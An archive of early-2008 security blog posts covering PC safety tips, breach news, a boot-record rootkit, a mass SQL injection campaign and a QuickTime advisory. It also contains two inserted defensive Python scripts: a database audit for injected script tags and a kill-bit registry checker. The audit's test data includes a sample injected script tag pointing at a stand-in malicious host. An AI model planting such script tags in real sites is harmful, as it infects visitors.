Thursday, January 31, 2008

Healthy Computing Tips

January 2008

Computer viruses, computer worms and Trojan horses are malicious computer programs that are designed to copy themselves and infect a computer without the permission or knowledge of the user. These programs, also known as malware, can cause disruption to the operation and function of your computer and can range from simple annoyances such as pop-ups to major problems such as causing your computer to reboot, data hijacking or hard drive failure. The number, types and effects of malware increase daily, so protection from these programs is essential. And, as is the case with human health, prevention is the best cure.

How can you avoid problems? If you are running a Windows operating system, install (at minimum) Windows critical updates. Most viruses attack weaknesses, or “holes,” in the Windows operating system. After a weakness is discovered, Microsoft issues a patch to close it. To install these patches, start Internet Explorer and click on Tools / Windows Updates. Additionally, you may want to set your computer to install these updates automatically (see your computer manual, Microsoft help menu or visit Microsoft’s website).

Although peer-to-peer network sharing is extremely popular these days, avoid downloading from an unknown source. I suggest downloading shared files to an old machine. Scan them and then transfer them to your computer system.

Purchase and install reliable Internet security software. There are good free programs available, but more often than not they are far from comprehensive, and you may end up running three different programs, which taxes your processing power. The software you choose should comprehensively protect you from viruses, adware, spyware, malware, intrusion, and phishing, and include a built-in firewall. Using a single program helps you to avoid software conflicts. Be sure that it includes automatic definition updates for the life of the software license. Be careful of the websites you visit. Certain types of websites are known sources for infection.

Your passwords are the keys to your computer’s heart and soul, so guard them with care.

Perform a comprehensive backup of your computer system daily. It is a good practice to schedule an automatic backup image of your system. There are advanced programs to do this for you, but you can use the backup feature built into your Windows operating system. Look in the “All Programs / Accessories” menu and start the backup wizard. You can set this function to run while you sleep and save to an external hard drive. That way, if your computer ever becomes infected, all you have to do is restore the uninfected backup.

For advanced users, try to use a router with a built-in firewall or request that your Internet Service Provider give you a router with firewall protection.

Thanks Shanitra X

Stakeholders gear up for e-Crime Congress 2008

January 2008

Over 500 delegates from global businesses, governments, and law enforcement agencies will meet in London in March at the e-Crime Congress 2008 to discuss cyber-threats and electronic crime. Identity theft and fraud continue to threaten security and consumer confidence, but last year saw an increasing number of attacks on the IT infrastructure of companies and governments. A senior architect at security firm MessageLabs told vnunet.com in a recent interview about a shadow economy in the underground world of hackers, which closely mimics traditional economic models.

Thursday, January 24, 2008

The Internet is down -- now what?

January 2008

According to the recent Business Roundtable report, “Growing Business Dependence on the Internet — New Risks Require CEO Action,” there is a 10 to 20 percent chance of a “breakdown of the critical information infrastructure” in the next 10 years, brought on by “malicious code, coding error, natural disasters, [or] attacks by terrorists and other adversaries.” An Internet meltdown would result in reduced productivity and profits, falling stock prices, erosion of consumer spending and potentially a liquidity crisis, the report says. The organization based its conclusions on earlier risk analyses done by the World Economic Forum in Geneva. The director of public policy at The Business Roundtable, an association of CEOs from large U.S. companies, says business executives often fail to realize how dependent they have become on the public network — for e-mail, collaboration, e-commerce, public-facing and internal Web sites, and information retrieval by employees. He also notes that disaster recovery and business-continuity plans often fail to take into account the threat an Internet disruption poses to a company and its suppliers. Moreover, business executives often mistakenly believe that government will take the lead in restoring network services in the face of an Internet failure, he says. “What we wanted to do in this report is say to CEOs, ‘You may not realize that whole segments of your business are almost completely dependent on the Internet, and it’s not enough to have a few IT specialists to help you respond to problems as they come up.’”

Friday, January 11, 2008

Audio Video HTML Oh my......

January 2008

A list of links for Mac or PC users to stream video, listen to and record audio, and work with HTML.

The Links:
For PC users playing Real Media files: http://www.free-codecs.com/download/Real_Alternative.htm
Mac users can play files with regular Real Player 10

Audacity for recording sound for Mac or PC users:
http://audacity.sourceforge.net/download/

Also download LAME; it allows the user to export the audio as an .mp3
http://lame.sourceforge.net/download.php

Update or download the latest version of QuickTime and iTunes (PC or Mac)
http://www.apple.com/quicktime/download/
(uncheck the boxes and don't enter email address)

And here is Wiretap:
http://www.ambrosiasw.com/utilities/wiretap/

And for HTML:
http://wordpress.org/download/

IRS information security still poor

January 2008

The Internal Revenue Service continues to have “pervasive” information security weaknesses that put taxpayer information at risk, and it has made limited progress in fixing dozens of problems the U.S. Government Accountability Office (GAO) has previously identified, according to a GAO report released Tuesday. The IRS, the tax-collecting arm of the U.S. government, has “persistent information security weaknesses that place [it] at risk of disruption, fraud or inappropriate disclosure of sensitive information,” the GAO report said. The agency, which collected about $2.7 trillion in taxes in 2007, has fixed just 29 of 98 information security weaknesses identified in a report released last March, the new report said. “Information security weaknesses -- both old and new -- continue to impair the agency’s ability to ensure the confidentiality, integrity and availability of financial and taxpayer information,” the GAO report said. “These deficiencies represent a material weakness in IRS’s internal controls over its financial and tax processing systems.” The GAO has issued multiple reports blasting IRS information security in recent years. The latest report described an IRS data center that took more than four months to install critical patches to server software. At one IRS data center, about 60 employees had access to commands that would allow them to make “significant” changes to the operating system, the GAO said. At two data centers, administrator access to a key application contained unencrypted data log-ins, potentially revealing users’ names and passwords. Three IRS sites visited by GAO auditors had computers or servers with poor password controls, the GAO said. The IRS also had lax physical security controls in place for protecting IT facilities, the GAO report said. One data center allowed at least 17 workers access to sensitive areas when their jobs did not require it, the GAO said. 
The IRS’s acting commissioner said the agency made significant progress in fixing information security problems during 2007, and in a letter to the GAO, said “While we agree that we have not yet fully implemented critical elements of our agency-wide information security program, the security and privacy of taxpayer information is of great concern to the IRS.”

Rootkit hides in HD's boot record...

January 2008

A rootkit that hides from Windows on the hard drive’s boot sector is infecting PCs, security researchers said today. Once installed, the cloaking software is undetectable by most current antivirus programs. The rootkit overwrites the hard drive’s master boot record (MBR), the first sector -- sector 0 -- where code is stored to bootstrap the operating system after the computer’s BIOS does its start-up checks. Because it hides on the MBR, the rootkit is effectively invisible to the operating system and security software installed on that operating system. “A traditional rootkit installs as a driver, just as when you install any hardware or software,” said the director of Symantec Corp.’s security response team. “Those drivers are loaded at or after the boot process. But this new rootkit installs itself before the operating system loads. It starts executing before the main operating system has a chance to execute.” Control the MBR, he continued, and you control the operating system, and thus the computer. According to other researchers, including those with the SANS Institute’s Internet Storm Center, Prevx Ltd., and a Polish analyst who uses the alias “gmer,” the rootkit has infected several thousand PCs since mid-December, and is used to cloak a follow-on bank account-stealing Trojan horse from detection, as well as to reinstall the identity thief if a security scanner somehow sniffs it out.

Thursday, January 10, 2008

Hackers turn Cleveland into malware server...

January 2008

Tens of thousands of websites belonging to Fortune 500 corporations, state government agencies, and schools have been infected with malicious code that attempts to engage in click fraud and steal online game credentials from people who visit the destinations, security researchers say. More than 94,000 URLs had been infected by the fast-moving exploit, which redirects users to the uc8010-dot-com domain. The security company Computer Associates was infected at one point, as were sites belonging to the state of Virginia, the city of Cleveland, and Boston University. Malicious hackers were able to breach the sites by exploiting un-patched SQL injection vulnerabilities that resided on the servers, according to the CTO for the SANS Internet Storm Center. The injections included JavaScript that redirected end users to the rogue site, which then attempted to exploit multiple vulnerabilities to install key-logging software that stole passwords for various online games. According to a researcher for ScanSafe, the exploits forced end users to visit sites that pay third parties a fee in exchange for sending them traffic. She speculates the attackers signed up as affiliates of the sites and then profited each time an end user was infected. The malware also installed keyloggers on end user machines that stole passwords to various online games, another researcher said. He added that the uc8010-dot-com domain was registered in late December using a Chinese-based registrar, indicating the attackers were fluent in Chinese.

Un-Hackable_L3t5 S33...

January 2008

‘Hacker safe’ Web site gets hit by hacker. On Friday, Geeks.com, a $150 million company specializing in the sale of computer-related excess inventory and manufacturers’ closeouts, began notifying an unspecified number of customers whose personal and financial data may have been compromised by an intrusion into the systems that run the online technology retailer’s Web site. The compromised information included the names, addresses, telephone numbers, and Visa credit card numbers of customers who had shopped at Geeks.com, according to a copy of the letter that was posted on The Consumerist blog. Its Web site prominently proclaims that it is tested on a daily basis by ScanAlert Inc., a vendor in Santa Clara, California, that agreed in October to be acquired by McAfee Inc. McAfee officials were not immediately available to comment on what might have happened at Geeks.com. A telephone operator at Geeks.com’s headquarters in Oceanside, California, said that she was unable to find anyone at the retailer who could comment about the incident. Last week’s notification included a number for non-U.S. residents to call, suggesting that the breach may have affected customers in other countries as well. According to the letter, which was signed by the chief of security at Geeks.com, the intrusion has been reported to local law enforcement authorities, as well as to the U.S. Secret Service. The incident has also been reported to Visa without providing any indication of why only Visa card numbers appear to have been compromised.

U.S. government needs new cybersecurity, Nah!!!

January 2008

U.S. government agencies need to take additional steps to protect against cybersecurity problems after a series of congressional hearings and reports exposed several weaknesses in 2007, representatives of Symantec Corp. said. The government sector, including state and local governments, accounted for 26 percent of data breaches that could lead to identity theft in the first half of 2007, according to Symantec’s latest Government Internet Security Threat Report, published in September. The U.S. Government Accountability Office (GAO) also issued about a dozen reports in the last six months criticizing federal agencies for not fully implementing the GAO’s cybersecurity recommendations. While U.S. agencies have a set of cybersecurity rules set out in the Federal Information Security Management Act, agencies are not held accountable when they have breaches, said Symantec’s vice president for the public sector. Agencies do not lose funding from Congress after cybersecurity incidents, he said. Agencies can take more steps to fix problems, he added, such as to inventory IT assets, to develop comprehensive cybersecurity plans, do systematic vulnerability testing, have a data backup plan and back up frequently. There still seems to be interest from lawmakers in agency cybersecurity and breach notification, he said. The hearings and information requests from lawmakers are bringing to light multiple attacks and breaches at agencies, he said. “There’s no real mechanism requiring agencies to report breaches,” added Symantec’s federal government relations manager.

Tuesday, January 08, 2008

Mass Hacks...

January 2008

Mass hack infects tens of thousands of sites. Tens of thousands of Web sites have been compromised by an automated SQL injection attack, and, although some have been cleaned, others continue to serve visitors a malicious script that tries to hijack their PCs using multiple exploits, security experts said this weekend. The chief research officer of Grisoft SRO pointed out that the hacked sites could be found via a simple Google search for the domain that hosted the malicious JavaScript. On Saturday, he said, the number of sites that had fallen victim to the attack numbered more than 70,000. “This was a pretty good mass-hack,” he said in a blog post.

“It wasn’t just that they got into a server farm, as the victims were quite diverse, with presumably the only common point being whatever vulnerability they all shared.” Symantec Corp. cited reports by other researchers that fingered a SQL vulnerability as the common thread. “The sites [were] hacked by hacking robot by means of a SQL injection attack, which executes an iterative SQL loop [that] finds every normal table in the database by looking in the sysobjects table and then appends every text column with the harmful script,” said one of the researchers. “It’s possible that only Microsoft SQL Server databases were hacked with this particular version of the robot since the script relies on the sysobjects table that this database contains.” According to the same researcher, the attack appends a JavaScript tag to every piece of text in the SQL database; the tag instructs any browser that reaches the site to execute the script hosted on the malicious server. Hacked sites included both .edu and .gov domains, added SANS Institute’s Internet Storm Center (ISC) in a warning posted last Friday, while others flagged several pages of security vendor CA Inc.’s Web site as infected.
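
A cleanup-side audit for the damage described above, as an added example that is not part of the original post: it walks every text column of every table and reports rows holding a script tag that loads from a host outside an allowlist. It uses Python's built-in sqlite3 as a stand-in for the SQL Server database (so `sqlite_master` plays the role of `sysobjects`); the table names, the allowlisted host and the `malicious.example` domain are constructed for illustration.

```python
import re
import sqlite3

# Captures the host of an externally loaded script, e.g. <script src="http://host/x.js">
SCRIPT_SRC = re.compile(
    r'''<script[^>]*\bsrc\s*=\s*["']?(?:https?:)?//([^/"'\s>]+)''', re.IGNORECASE)


def q(identifier):
    """Quote a table or column name; identifiers cannot be bound as parameters."""
    return '"' + identifier.replace('"', '""') + '"'


def text_columns(conn):
    """Yield (table, column) for every text-typed column of every user table."""
    tables = conn.execute(
        "SELECT name FROM sqlite_master "
        "WHERE type = 'table' AND name NOT LIKE 'sqlite_%'").fetchall()
    for (table,) in tables:
        for _cid, col, ctype, *_rest in conn.execute(
                f"PRAGMA table_info({q(table)})"):
            if any(t in ctype.upper() for t in ("CHAR", "TEXT", "CLOB")):
                yield table, col


def find_injected_scripts(conn, allowed_hosts):
    """Return (table, column, rowid, host) for each script tag from an unknown host."""
    allowed = {h.lower() for h in allowed_hosts}
    findings = []
    for table, col in text_columns(conn):
        rows = conn.execute(
            f"SELECT rowid, {q(col)} FROM {q(table)} WHERE {q(col)} LIKE ?",
            ("%<script%",))
        for rowid, value in rows:
            for host in SCRIPT_SRC.findall(value):
                if host.lower() not in allowed:
                    findings.append((table, col, rowid, host.lower()))
    return findings


def build_sample_db():
    """Constructed database: one legitimate script tag, three appended ones."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE articles (id INTEGER PRIMARY KEY, title VARCHAR(80), body TEXT);
        CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, age INTEGER);
    """)
    injected = '<script src="http://malicious.example/0.js"></script>'
    legit = '<script src="https://static.example.org/app.js"></script>'
    conn.execute("INSERT INTO articles VALUES (1, ?, ?)",
                 ("Welcome" + injected, "Hello" + injected))
    conn.execute("INSERT INTO articles VALUES (2, ?, ?)", ("Widgets", legit))
    conn.execute("INSERT INTO users VALUES (1, ?, 30)", ("alice" + injected,))
    return conn


if __name__ == "__main__":
    for finding in find_injected_scripts(build_sample_db(), {"static.example.org"}):
        print(finding)
```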

BREACH!!!

January 2008

Breaches plague government agencies. Two more major losses of private data have been reported by government agencies in the past few days, adding fuel to fiery criticism of federal and regional government’s privacy practices over recent weeks, both in the U.S. and overseas. A holiday break-in at the Davidson County Election Office in Tennessee resulted in the theft of two laptops containing personal information on all 337,000 voters in the region, according to reports. The data included full Social Security numbers for each voter, and at least one report indicated that the data was not encrypted. Meanwhile, more than 10,000 U.S. Air Force active and retired employees were informed Friday that a laptop containing their Social Security numbers, birth dates, addresses, and telephone numbers is missing, according to reports. The laptop belonged to an Air Force band member at Bolling Air Force Base in Washington, D.C., and was reported missing from his home. A stolen laptop containing personal information was also reported by the Minnesota Department of Commerce on Friday. The data losses by the regional and federal government agencies in the U.S. are fuel to the fire of criticism that has taken place in the U.K. over the past several weeks, as more details come to light about breaches in several British government agencies. Criminals may not even have to break in or steal data to get citizens’ personal information from government agencies, according to a report in yesterday’s Washington Post. The report notes that criminals can gather names, Social Security numbers, and other personal data simply by scanning through online public records and documents.

California opens office to fight ID theft...

January 2008

California’s governor opened a new office Wednesday to fight high-tech identity theft -- a move activists said will help, as firms fail to meet California’s landmark consumer privacy laws. The governor’s administration merged separate departments into the single California Office of Information Security and Privacy Protection, which officials said will be unique among states as it helps guide law enforcement, businesses, advocacy groups, and consumers. The governor, who signed legislation carrying out the merger, has convened two summits so far against identity theft, which experts say is escalating as the Internet opens up new opportunities for criminals. Government and business groups have vowed to work together more closely, while urging consumers to protect themselves against data theft with computer firewalls and other software programs that protect against online intrusions. The new agency combines the former Office of Privacy Protection in the Department of Consumer Affairs, which opened in 2001, with the state Information Security Office, formerly part of the Department of Finance. “This union will strengthen the efforts of both offices,” said the secretary of the State and Consumer Services Agency.

Friday, January 04, 2008

Sears & K-mart: Spooky Big Business...

January 2008

Researcher says Sears downloads spyware. Sears and Kmart customers who sign up for a new marketing program may be giving up more private information than they bargained for, a prominent anti-spyware researcher claims. According to a Harvard Business School Assistant Professor, Sears Holdings’ My SHC Community program falls short of Federal Trade Commission (FTC) standards by failing to notify users exactly what happens when they download the company’s marketing software. Given the invasive nature of the product, Sears has an obligation to make its behavior clearer to users. “The software is not something you’d want on your computer or the computer of anyone you care about,” the professor said in an interview. “It tracks every site you go to, every search you make, every product you buy, and every product you look at but don’t buy. It’s just spooky.”

Thursday, January 03, 2008

Edit PDFs on a Mac...

January 2008

If you do not have Adobe Professional here is an alternative...

Fill out PDF forms and edit PDFs easily with PDFpen! Split, combine, reorder, sign and augment PDFs with text, image overlays & watermarks. Download PDFpen and try it now!

Use PDFpen with PageSender for a complete turnaround fax solution.

- Receive a fax form via PageSender
- Open it in PDFpen
- Fill it out with PDFpen & even scribble your signature
- Fax it right back via PageSender direct from PDFpen!

No printing or scanning necessary!

Need to merge pages from several PDF files together?
– Open the files in PDFpen and drag the pages you need from each into a new document

Need to sign that electronic fax?
– Open the fax in PDFpen and scribble your signature with the mouse or drag in a scan of it. Scale it to sign on the dotted line.

Need to cut a PDF document down to size?
– Open a copy in PDFpen, select the pages to remove, hit Delete, and save. It's that easy.

Need to repurpose PDF content?
– Now you can search, select and copy the text of PDF documents.

Need to apply custom serial numbers to your PDF documents?
– PDFpen is fully scriptable, so you can automate nearly anything you can do in the interface.

Apple's QuickTime...

January 2008

SUBJECT:
Apple QuickTime RTSP Response Header Remote Stack Based Buffer Overflow

ORIGINAL OVERVIEW:

A new vulnerability in Apple Quicktime is actively being exploited on the Internet. The vulnerability can be exploited if a user visits a malicious web site. If the vulnerability is successfully exploited, an attacker may be able to execute arbitrary code on a vulnerable system with the same rights of the logged-on user. This may allow the attacker to gain complete control of the affected system.

Note that there is currently no patch for this vulnerability.

UPDATED INFORMATION:
Apple released a patch that addresses the QuickTime RTSP vulnerability. This patch also addresses two other vulnerabilities; refer to the updated Description section below for additional technical details on these vulnerabilities. See the Reference sections below for patch download locations and additional information. We recommend that this patch be installed immediately on all affected systems after appropriate testing.

SYSTEMS AFFECTED:

Apple QuickTime Player 7.3 and earlier

RISK:

Government:

Large and medium government entities: High
Small government entities: High

ORIGINAL DESCRIPTION:

Apple Quicktime is a media player for the Mac OS X and Microsoft Windows operating systems.

A new vulnerability has been discovered in Quicktime that is currently being exploited on the Internet. Quicktime is prone to a remote buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input before copying it to an insufficiently sized stack-based memory buffer. The issue occurs when handling specially crafted Real Time Streaming Protocol (RTSP) response headers.

RTSP is a protocol used by Quicktime to stream media content over the internet. By default, the protocol runs over ports 554 tcp/udp and 6970-6999 udp. The protocol also runs over an alternative port of 8554 tcp/udp. However, the protocol can be configured to run over any port which allows for firewalls to be circumvented by hosting the malicious RTSP server on 80/tcp or another commonly unfiltered port.

This vulnerability can be exploited if a user visits a specially crafted web page that hosts the malicious content or opens a malicious e-mail attachment. The user would then have to view the content by clicking a link or having it load automatically within the web page. When the user views the content, the RTSP server would then send the exploit code designed to perform some action on the attacker’s behalf. A failed attack will likely cause denial-of-service conditions.

DECEMBER 14 UPDATED DESCRIPTION:

Apple released a patch that addresses the QuickTime RTSP vulnerability. In addition, the patch also fixes multiple vulnerabilities in QuickTime’s media handler and a heap overflow vulnerability caused by viewing a specially-crafted QTL file.

ORIGINAL RECOMMENDATIONS:
We recommend the following actions be taken:

- Set the kill bit on the Class Identifiers (CLSIDs) {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B} and {4063BE15-3B08-470D-A0D5-B37161CFFD69}; further instructions on how to set the kill bit can be found at http://support.microsoft.com/kb/240797
- Blocking the RTSP protocol with a proxy or firewall may help mitigate this vulnerability.
- Blocking outbound access to ports 554 tcp/udp, 6970-6999 udp, and 8554 tcp/udp may partially mitigate this vulnerability. Since RTSP can be configured to use a variety of ports, blocking RTSP by port may not be sufficient.
- Run all software as a non-privileged user (one without administrative privileges) to diminish the effects of a successful attack.
- Do not visit unknown or un-trusted Web sites or follow links provided by unknown or un-trusted sources.
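
One way to verify the kill-bit recommendation across machines, as an added example that is not part of the original advisory: it reads a registry export (.reg text) and reports whether each of the two CLSIDs listed above has the 0x400 kill bit set in its "Compatibility Flags" value, and it can render the .reg file that sets it. The registry path and flag value follow the Microsoft KB article the advisory links to; the function names and the sample export are constructed for illustration.

```python
import re

KILL_BIT = 0x00000400
COMPAT_KEY = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft"
              r"\Internet Explorer\ActiveX Compatibility")
# The two CLSIDs named in the advisory above.
QUICKTIME_CLSIDS = [
    "{02BF25D5-8C17-4B23-BC80-D3488ABDDC6B}",
    "{4063BE15-3B08-470D-A0D5-B37161CFFD69}",
]
FLAGS_LINE = re.compile(r'"Compatibility Flags"=dword:([0-9a-fA-F]{8})$')


def parse_compat_flags(reg_text):
    """Map CLSID -> "Compatibility Flags" value found in a .reg export."""
    flags, current = {}, None
    for line in reg_text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            parent, _, leaf = line[1:-1].rpartition("\\")
            # Only subkeys directly under ActiveX Compatibility count.
            current = leaf.upper() if parent.upper() == COMPAT_KEY.upper() else None
        elif current:
            match = FLAGS_LINE.match(line)
            if match:
                flags[current] = int(match.group(1), 16)
    return flags


def kill_bit_status(reg_text, clsids=QUICKTIME_CLSIDS):
    """Return {clsid: True/False}; a missing key or value counts as not set."""
    flags = parse_compat_flags(reg_text)
    return {c: bool(flags.get(c.upper(), 0) & KILL_BIT) for c in clsids}


def kill_bit_reg(clsids=QUICKTIME_CLSIDS):
    """Render .reg text that sets the kill bit for each CLSID."""
    lines = ["Windows Registry Editor Version 5.00", ""]
    for clsid in clsids:
        lines += [f"[{COMPAT_KEY}\\{clsid}]",
                  f'"Compatibility Flags"=dword:{KILL_BIT:08x}', ""]
    return "\r\n".join(lines)


# Constructed export: the first control is blocked, the second is not.
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{02BF25D5-8C17-4B23-BC80-D3488ABDDC6B}]
"Compatibility Flags"=dword:00000400

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{4063BE15-3B08-470D-A0D5-B37161CFFD69}]
"Compatibility Flags"=dword:00000000
"""

if __name__ == "__main__":
    for clsid, is_set in kill_bit_status(SAMPLE_EXPORT).items():
        print(clsid, "kill bit set" if is_set else "kill bit NOT set")
```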

UPDATED RECOMMENDATIONS:

Apply the appropriate patch to vulnerable systems immediately after appropriate testing. The patch is available at: http://www.apple.com/support/downloads/